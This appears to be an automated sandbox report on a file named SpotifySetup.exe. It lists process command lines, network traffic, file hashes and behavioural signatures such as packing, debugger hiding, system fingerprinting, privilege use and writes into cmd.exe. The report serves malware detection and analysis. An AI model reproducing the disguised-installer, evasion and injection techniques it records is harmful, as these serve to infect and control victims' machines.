"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=1292 --field-trial-handle=1380,i,16712762652120161543,713932538615166254,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3424 --field-trial-handle=1380,i,16712762652120161543,713932538615166254,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3540 --field-trial-handle=1380,i,16712762652120161543,713932538615166254,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3648 --field-trial-handle=1380,i,16712762652120161543,713932538615166254,131072 /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 www.google.com udp
GB 142.250.187.196:443 www.google.com udp
GB 142.250.187.196:443 www.google.com tcp
US 8.8.8.8:53 apis.google.com udp
GB 142.250.200.14:443 apis.google.com tcp
US 8.8.8.8:53 play.google.com udp
GB 142.250.179.238:443 play.google.com tcp
N/A 224.0.0.251:5353 udp

Files

C:\Users\Admin\AppData\Local\Temp\_MEI17442\python311.dll

MD5 0e06f85bcfb1c684469ce62e35b5c272
SHA1 73122369425c1fec9a035975a1834139f6869279
SHA256 6209e55cae73ab3d7bb19a80cd4fb9981b6a3db75bcd5036e84084b23956d9f8
SHA512 c4077f23bf2bc1b2826ad85b4955419b4f79c1bba144372e6706ee8e07ea252d820fdb8c43a6fdd4020fa1e468aff287df443a42b2fdcbd9f41d56f5bbe83b4f

memory/1884-24-0x0000000074380000-0x000000007488B000-memory.dmp

memory/2512-46-0x0000000140000000-0x00000001405E8000-memory.dmp

memory/2512-47-0x0000000140000000-0x00000001405E8000-memory.dmp

memory/2512-48-0x0000000140000000-0x00000001405E8000-memory.dmp

memory/2512-49-0x0000000140000000-0x00000001405E8000-memory.dmp

\??\pipe\crashpad_1904_XRDXCBMZFYSUWBRT

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\000007.dbtmp

MD5 18e723571b00fb1694a3bad6c78e4054
SHA1 afcc0ef32d46fe59e0483f9a3c891d3034d12f32
SHA256 8af72f43857550b01eab1019335772b367a17a9884a7a759fdf4fe6f272b90aa
SHA512 43bb0af7d3984012d2d67ca6b71f0201e5b948e6fe26a899641c4c6f066c59906d468ddf7f1df5ea5fa33c2bc5ea8219c0f2c82e0a5c365ad7581b898a8859e2

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ShaderCache\data_1

MD5 f50f89a0a91564d0b8a211f8921aa7de
SHA1 112403a17dd69d5b9018b8cede023cb3b54eab7d
SHA256 b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec
SHA512 bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\000006.dbtmp

MD5 aefd77f47fb84fae5ea194496b44c67a
SHA1 dcfbb6a5b8d05662c4858664f81693bb7f803b82
SHA256 4166bf17b2da789b0d0cc5c74203041d98005f5d4ef88c27e8281e00148cd611
SHA512 b733d502138821948267a8b27401d7c0751e590e1298fda1428e663ccd02f55d0d2446ff4bc265bdcdc61f952d13c01524a5341bc86afc3c2cde1d8589b2e1c3

memory/2512-117-0x0000000140000000-0x00000001405E8000-memory.dmp

memory/2512-118-0x0000000140000000-0x00000001405E8000-memory.dmp

memory/2512-135-0x0000000140000000-0x00000001405E8000-memory.dmp

memory/2512-136-0x0000000140000000-0x00000001405E8000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 b4ab338c5155c441d486b901f5fd8517
SHA1 2a556d34e9789d7cd51a0de4aa6ee594c1b9dce3
SHA256 a57ff71ae129023db8cd0be6df227dd1ed15ae3633c2914d7d964afcc714ea67
SHA512 c31fd96c8265bc20c3f36570af6a21bafc07527882700a299150d0df09c8016298fe7d253e2803c68d311c533096e62a26ee2845d6d17cc849f862b8a4094cc7

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 4fdee01a62b414bad0405684f1ed5b83
SHA1 1e03ae6f8a905a2bcfd8b5dc1cad7dc088a354a6
SHA256 b80f24bac35d57039519d6c6343ea9c5123e8419780b006f5d31792ff9f2921a
SHA512 0d9a19709f9b9773db86a9dfb447cae960186d79395c8025315b41cf6d685e9980e4583d453913d1ec582dfe8160cabbf44b814bc3c8202371917139e0099fed

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\f64b124a-5740-4be1-9899-57152893064e.tmp

MD5 4798efa23e1c545390898759dd33731e
SHA1 2e6eeaf9e0757b04332a0282f35af72fb97583ea
SHA256 6b35ad67299c5463f97a172d4a915601c4e2d5eb3badc845e595c765c455800a
SHA512 e3653a193dc8bc335f3519fb288048d6beb8d216844e20f6b8883255d0ffaf4f94ed3163ebc93fd157cd26dd74a82a775c7f5a80c50c62bb61089a23dae89411

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 f73352890c46eb8a39bdebcff7b77c49
SHA1 ca4bc589ae0cac2469b01e1dfff75f5ed0a02821
SHA256 674af2fc89443e730ad742272ef134ae57c9fe8f7a464b1cb1afd08fedf704b0
SHA512 55398513a43cce6ce270820fb3bbfc3fd8ddca03bca69f57bd807c3143c07c5f86814f5056d12d1f844d5e95cf242f001ecff0e6dfdb8c72e26a076869d6214a

memory/2512-233-0x0000000140000000-0x00000001405E8000-memory.dmp

memory/2512-234-0x0000000140000000-0x00000001405E8000-memory.dmp

memory/2512-235-0x0000000140000000-0x00000001405E8000-memory.dmp

memory/2512-236-0x0000000140000000-0x00000001405E8000-memory.dmp

memory/2512-237-0x0000000140000000-0x00000001405E8000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-21 23:35

Reported

2024-06-21 23:40

Platform

win10v2004-20240508-en

Max time kernel

209s

Max time network

206s

Command Line

"C:\Users\Admin\AppData\Local\Temp\SpotifySetup.exe"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

ACProtect 1.3x - 1.4x DLL software

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\system32\taskmgr.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 C:\Windows\system32\taskmgr.exe N/A

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings C:\Windows\system32\taskmgr.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3996 wrote to memory of 3308 N/A C:\Users\Admin\AppData\Local\Temp\SpotifySetup.exe C:\Users\Admin\AppData\Local\Temp\SpotifySetup.exe
PID 3996 wrote to memory of 3308 N/A C:\Users\Admin\AppData\Local\Temp\SpotifySetup.exe C:\Users\Admin\AppData\Local\Temp\SpotifySetup.exe
PID 3996 wrote to memory of 3308 N/A C:\Users\Admin\AppData\Local\Temp\SpotifySetup.exe C:\Users\Admin\AppData\Local\Temp\SpotifySetup.exe
PID 3308 wrote to memory of 5032 N/A C:\Users\Admin\AppData\Local\Temp\SpotifySetup.exe C:\Windows\SysWOW64\cmd.exe
PID 3308 wrote to memory of 5032 N/A C:\Users\Admin\AppData\Local\Temp\SpotifySetup.exe C:\Windows\SysWOW64\cmd.exe
PID 3308 wrote to memory of 5032 N/A C:\Users\Admin\AppData\Local\Temp\SpotifySetup.exe C:\Windows\SysWOW64\cmd.exe
PID 3308 wrote to memory of 2236 N/A C:\Users\Admin\AppData\Local\Temp\SpotifySetup.exe C:\Windows\SysWOW64\cmd.exe
PID 3308 wrote to memory of 2236 N/A C:\Users\Admin\AppData\Local\Temp\SpotifySetup.exe C:\Windows\SysWOW64\cmd.exe
PID 3308 wrote to memory of 2236 N/A C:\Users\Admin\AppData\Local\Temp\SpotifySetup.exe C:\Windows\SysWOW64\cmd.exe
PID 3308 wrote to memory of 548 N/A C:\Users\Admin\AppData\Local\Temp\SpotifySetup.exe C:\Windows\SysWOW64\cmd.exe
PID 3308 wrote to memory of 548 N/A C:\Users\Admin\AppData\Local\Temp\SpotifySetup.exe C:\Windows\SysWOW64\cmd.exe
PID 3308 wrote to memory of 548 N/A C:\Users\Admin\AppData\Local\Temp\SpotifySetup.exe C:\Windows\SysWOW64\cmd.exe
PID 3308 wrote to memory of 4572 N/A C:\Users\Admin\AppData\Local\Temp\SpotifySetup.exe C:\Windows\SysWOW64\cmd.exe
